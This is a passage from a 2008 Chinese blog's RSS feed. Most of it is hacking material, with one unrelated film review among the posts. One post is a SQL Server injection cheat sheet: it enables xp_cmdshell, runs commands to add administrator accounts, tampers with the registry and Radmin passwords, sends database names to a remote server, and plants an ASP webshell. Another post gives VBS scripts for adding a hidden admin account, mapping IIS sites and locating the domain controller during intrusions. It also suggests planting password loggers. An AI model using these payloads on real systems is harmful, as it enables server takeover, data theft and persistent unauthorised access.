;exec&nbsp;master..dbo.sp_addextendedproc&nbsp;'xp_cmdshell','xplog70.dll';--<br/>

<br/>
<br/>
select&nbsp;*&nbsp;from&nbsp;openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select&nbsp;@@version')&nbsp;<br/>

<br/>
//-----------------------<br/>
//&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;执行命令<br/>

//-----------------------<br/>
首先开启沙盘模式：<br/>
exec&nbsp;master..xp_regwrite&nbsp;'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1<br/>

<br/>
然后利用jet.oledb执行系统命令<br/>
select&nbsp;*&nbsp;from&nbsp;openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select&nbsp;shell("cmd.exe&nbsp;/c&nbsp;net&nbsp;user&nbsp;admin&nbsp;admin1234&nbsp;/add")')<br/>

<br/>
执行命令<br/>
;DECLARE&nbsp;@shell&nbsp;INT&nbsp;EXEC&nbsp;SP_OAcreate&nbsp;'wscript.shell',@shell&nbsp;OUTPUT&nbsp;EXEC&nbsp;SP_OAMETHOD&nbsp;@shell,'run',null,&nbsp;'C:\WINNT\system32\cmd.exe&nbsp;/c&nbsp;net&nbsp;user&nbsp;paf&nbsp;pafpaf&nbsp;/add';--<br/>

<br/>
EXEC&nbsp;[master].[dbo].[xp_cmdshell]&nbsp;'cmd&nbsp;/c&nbsp;md&nbsp;c:\1111'<br/>

<br/>
判断xp_cmdshell扩展存储过程是否存在：<br/>
<a HREF="http://192.168.1.5/display.asp?keyno=188" TARGET="_blank">http://192.168.1.5/display.asp?keyno=188</A>&nbsp;and&nbsp;1=(Select&nbsp;count(*)&nbsp;FROM&nbsp;master.dbo.sysobjects&nbsp;Where&nbsp;xtype&nbsp;=&nbsp;'X'&nbsp;AND&nbsp;name&nbsp;=&nbsp;'xp_cmdshell')<br/>

<br/>
写注册表<br/>
exec&nbsp;master..xp_regwrite&nbsp;'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1<br/>

<br/>
REG_SZ<br/>
<br/>
读注册表<br/>
exec&nbsp;master..xp_regread&nbsp;'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows&nbsp;NT\CurrentVersion\Winlogon','Userinit'<br/>

<br/>
读取目录内容<br/>
exec&nbsp;master..xp_dirtree&nbsp;'c:\winnt\system32\',1,1<br/>

<br/>
<br/>
数据库备份<br/>
backup&nbsp;database&nbsp;pubs&nbsp;to&nbsp;disk&nbsp;=&nbsp;'c:\123.bak'<br/>

<br/>
//爆出长度<br/>
And&nbsp;(Select&nbsp;char(124)%2BCast(Count(1)&nbsp;as&nbsp;varchar(8000))%2Bchar(124)&nbsp;From&nbsp;D99_Tmp)=0&nbsp;;--<br/>

<br/>
<br/>
<br/>
更改sa口令方法：用sql综合利用工具连接后，执行命令：<br/>
exec&nbsp;sp_password&nbsp;NULL,'新密码','sa'<br/>

<br/>
添加和删除一个SA权限的用户test：<br/>
exec&nbsp;master.dbo.sp_addlogin&nbsp;test,ptlove<br/>

exec&nbsp;master.dbo.sp_addsrvrolemember&nbsp;test,sysadmin<br/>

<br/>
删除扩展存储过过程xp_cmdshell的语句:&nbsp;<br/>
exec&nbsp;sp_dropextendedproc&nbsp;'xp_cmdshell'<br/>

<br/>
添加扩展存储过过程<br/>
EXEC&nbsp;[master]..sp_addextendedproc&nbsp;'xp_proxiedadata',&nbsp;'c:\winnt\system32\sqllog.dll'&nbsp;<br/>

GRANT&nbsp;exec&nbsp;On&nbsp;xp_proxiedadata&nbsp;TO&nbsp;public&nbsp;<br/>

<br/>
<br/>
停掉或激活某个服务。&nbsp;<br/>
<br/>
exec&nbsp;master..xp_servicecontrol&nbsp;'stop','schedule'<br/>

exec&nbsp;master..xp_servicecontrol&nbsp;'start','schedule'<br/>

<br/>
dbo.xp_subdirs<br/>
<br/>
只列某个目录下的子目录。<br/>
xp_getfiledetails&nbsp;'C:\Inetpub\wwwroot\SQLInject\login.asp'<br/>

<br/>
dbo.xp_makecab<br/>
<br/>
将目标多个档案压缩到某个目标档案之内。<br/>
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。<br/>
<br/>
dbo.xp_makecab<br/>
'c:\test.cab','mszip',1,<br/>
'C:\Inetpub\wwwroot\SQLInject\login.asp',<br/>
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'<br/>
<br/>
xp_terminate_process<br/>
<br/>
停掉某个执行中的程序，但赋予的参数是&nbsp;Process&nbsp;ID。<br/>

利用”工作管理员”，透过选单「检视」-「选择字段」勾选&nbsp;pid，就可以看到每个执行程序的&nbsp;Process&nbsp;ID<br/>

<br/>
xp_terminate_process&nbsp;2484<br/>
<br/>
xp_unpackcab<br/>
<br/>
解开压缩档。<br/>
<br/>
xp_unpackcab&nbsp;'c:\test.cab','c:\temp',1<br/>
<br/>
<br/>
某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit&nbsp;/e&nbsp;导入注册文件，但是mssql是sa权限，使用如下命令&nbsp;EXEC&nbsp;master.dbo.xp_regwrite&nbsp;'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c&nbsp;即可修改密码为12345678。如果要修改端口值&nbsp;EXEC&nbsp;master.dbo.xp_regwrite&nbsp;'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400&nbsp;则端口值改为1234<br/>

<br/>
create&nbsp;database&nbsp;lcx;<br/>
Create&nbsp;TABLE&nbsp;ku(name&nbsp;nvarchar(256)&nbsp;null);<br/>

Create&nbsp;TABLE&nbsp;biao(id&nbsp;int&nbsp;NULL,name&nbsp;nvarchar(256)&nbsp;null);<br/>

<br/>
//得到数据库名<br/>
insert&nbsp;into&nbsp;opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku&nbsp;select&nbsp;name&nbsp;from&nbsp;master.dbo.sysdatabases<br/>

<br/>
<br/>
//在Master中创建表，看看权限怎样<br/>
Create&nbsp;TABLE&nbsp;master..D_TEST(id&nbsp;nvarchar(4000)&nbsp;NULL,Data&nbsp;nvarchar(4000)&nbsp;NULL);--<br/>

<br/>
用&nbsp;sp_makewebtask直接在web目录里写入一句话马：<br/>

<a HREF="http://127.0.0.1/dblogin123.asp?username=123" TARGET="_blank">http://127.0.0.1/dblogin123.asp?username=123</A>';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''&lt;%25execute(request("a"))%25&gt;''%20';--<br/>

<br/>
//更新表内容<br/>
Update&nbsp;films&nbsp;SET&nbsp;kind&nbsp;=&nbsp;'Dramatic'&nbsp;Where&nbsp;id&nbsp;=&nbsp;123<br/>

<br/>
//删除内容<br/>
delete&nbsp;from&nbsp;table_name&nbsp;where&nbsp;Stockid&nbsp;=&nbsp;3<br/>
</DIV>
]]></description>
            <author>Хакеры</author>
            <category>技术文章</category>
            <comments>http://blog.sina.com.cn/s/blog_5053fe78010087di.html#comment</comments>
            <pubDate>Wed, 09 Jan 2008 11:06:46 GMT+8</pubDate>
            <guid>http://blog.sina.com.cn/s/blog_5053fe78010087di.html</guid>
        </item>
        <item>
            <title>说说这个投名状</title>
            <link>http://blog.sina.com.cn/s/blog_5053fe78010087df.html</link>
            <description><![CDATA[<div>
&nbsp;有网友总结了十二个字：两个兄弟和一男一女的故事<br/>

这个电影看着挺伤感的，哎，没有想到李连杰演反派人物可以来的这么阴险，
<img ALT="[yes]" SRC="http://www.b0r3d.cn/blog/styles/default/images/smilies/icon_no.gif" BORDER="0"></IMG><br/>
嘴上总是挂着<span STYLE="COLOR: red">兵不厌诈</SPAN>，可是他还是忘了，<span STYLE="COLOR: red">出来混迟早要还的</SPAN>。<br/>
再给一个八卦报道<br/>
难道陈可辛拍《投名状》的钱都是冯小刚出的？<br/>
<a TITLE="http://dzh.mop.com/dwdzh/topic/readSub_41_7977104_0_0.html" HREF="http://dzh.mop.com/dwdzh/topic/readSub_41_7977104_0_0.html" TARGET="_blank">http://dzh.mop.com/dwdzh/topic/readSub_41_7977104_0_0.html</A></DIV>
]]></description>
            <author>Хакеры</author>
            <comments>http://blog.sina.com.cn/s/blog_5053fe78010087df.html#comment</comments>
            <pubDate>Wed, 09 Jan 2008 11:00:46 GMT+8</pubDate>
            <guid>http://blog.sina.com.cn/s/blog_5053fe78010087df.html</guid>
        </item>
        <item>
            <title>我在入侵渗透中用过的三则VBS代码</title>
            <link>http://blog.sina.com.cn/s/blog_5053fe78010087d5.html</link>
            <description><![CDATA[<div>&nbsp;一、用VBS来加管理员帐号<br/>
<br/>
经常看到有人在论坛上讨论，在注入过程中明明有了sa帐号，但是由于net.exe和net1.exe被限制，或其它的不明原因，总是加不了管理员帐号。VBS在活动目录（adsi）部份有一个winnt对像，可以用来管理本地资源，可以用它不依靠cmd等命令来加一个管理员，详细代码如下：<br/>

<br/>
★<br/>
set wsnetwork=CreateObject("WSCRIPT.NETWORK")<br/>
os="WinNT://"&amp;wsnetwork.ComputerName<br/>
Set ob=GetObject(os) '得到adsi接口,绑定<br/>
Set oe=GetObject(os&amp;"/Administrators,group")
'属性,admin组<br/>
Set od=ob.Create("user","lcx") '建立用户<br/>
od.SetPassword "123456" '设置密码<br/>
od.SetInfo '保存<br/>
Set of=GetObject(os&amp;"/lcx",user) '得到用户<br/>
oe.add os&amp;"/lcx"<br/>
★<br/>
<br/>
这段代码如果保存为1.vbs，在cmd下运行，格式: ●cscript
1.vbs●的话，会在当前系统加一个名字为lcx，密码为123456的管理员。当然，你可以用记事本来修改里边的变量lcx和123456，改成你喜欢的名字和密码值。<br/>

<br/>
二、用vbs来列虚拟主机的物理目录<br/>
<br/>
有时旁注入侵成功一个站，拿到系统权限后，面对上百个虚拟主机，怎样才能更快的找到我们目标站的物理目录呢？一个站一个站翻看太累，用系统自带的adsutil.vbs吧又感觉好像参数很多，有点无法下手的感觉，试试我这个脚本吧，代码如下：<br/>

<br/>
★<br/>
Set ObjService=GetObject("IIS://LocalHost/W3SVC")<br/>
For Each obj3w In objservice<br/>
If IsNumeric(obj3w.Name) Then<br/>
sServerName=Obj3w.ServerComment<br/>
Set webSite = GetObject("IIS://Localhost/W3SVC/" &amp; obj3w.Name
&amp; "/Root")<br/>
ListAllWeb = ListAllWeb &amp; obj3w.Name &amp;
String(25-Len(obj3w.Name)," ") &amp; obj3w.ServerComment &amp; "("
&amp; webSite.Path &amp; ")" &amp; vbCrLf<br/>
<br/>
End If<br/>
Next<br/>
WScript.Echo ListAllWeb<br/>
Set ObjService=Nothing<br/>
WScript.Quit<br/>
★<br/>
<br/>
运行●cscript
2.vbs●后，就会详细列出IIS里的站点ID、描述、及物理目录，是不是代码少很多又方便呢？<br/>

<br/>
三、快速找到内网域的主服务器<br/>
<br/>
面对域结构的内网，可能许多小菜没有经验如何去渗透。如果你能拿到主域管理员的密码，整个内网你就可以自由穿行了。主域管理员一般呆在比较重要的机器上，如果能搞定其中的一台或几台，放个密码记录器之类，相信总有一天你会拿到密码。主域服务器当然是其中最重要一台了，如何在成千台机器里判断出是哪一台呢？
dos命令像●net group "domain admins"
/domain●可以做为一个判断的标准，不过vbs也可以做到的，这仍然属于adsi部份的内容，代码如下：<br/>

<br/>
★<br/>
set obj=GetObject("LDAP://rootDSE")<br/>
wscript.echo obj.servername<br/>
★<br/>
<br/>
只用这两句代码就足够了，运行●cscript
3.vbs●，会有结果的。当然，无论是dos命令或vbs，你前提必须要在域用户的权限下。好比你得到了一个域用户的帐号密码，你可以用
psexec.exe -u -p
cmd.exe这样的格式来得到域用户的shell，或你的木马本来就是与桌面交互的，登陆你木马shell的又是域用户，就可以直接运行这些命令了。<br/>

<br/>
vbs的在入侵中的作用当然不只这些，当然用js或其它工具也可以实现我上述代码的功能；不过这个专栏定下的题目是vbs在hacking中的妙用，所以我们只提vbs。写完vbs这部份我和其它作者会在以后的专栏继续策划其它的题目，争取为读者带来好的有用的文章。</DIV>
]]></description>
            <author>Хакеры</author>
            <comments>http://blog.sina.com.cn/s/blog_5053fe78010087d5.html#comment</comments>
            <pubDate>Wed, 09 Jan 2008 10:33:29 GMT+8</pubDate>
            <guid>http://blog.sina.com.cn/s/blog_5053fe78010087d5.html</guid>
        </item>
    </channel>
</rss>
